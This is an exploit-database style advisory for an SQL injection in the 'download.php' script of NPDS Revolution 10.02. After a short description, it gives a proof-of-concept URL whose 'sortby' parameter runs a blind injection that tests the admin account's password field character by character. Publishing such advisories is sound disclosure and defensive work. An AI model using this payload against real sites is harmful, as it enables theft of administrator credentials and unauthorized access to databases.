[] NeoSense

NPDS REvolution 10.02 - 'download.php' SQL Injection

Author: High-Tech Bridge SA
type: webapps
platform: php
port: 
date_added: 2010-05-13 
date_updated: 2014-07-06 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/40156/info

NPDS Revolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

NPDS Revolution 10.02 is vulnerable; other versions may also be affected.

http://www.example.com/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC--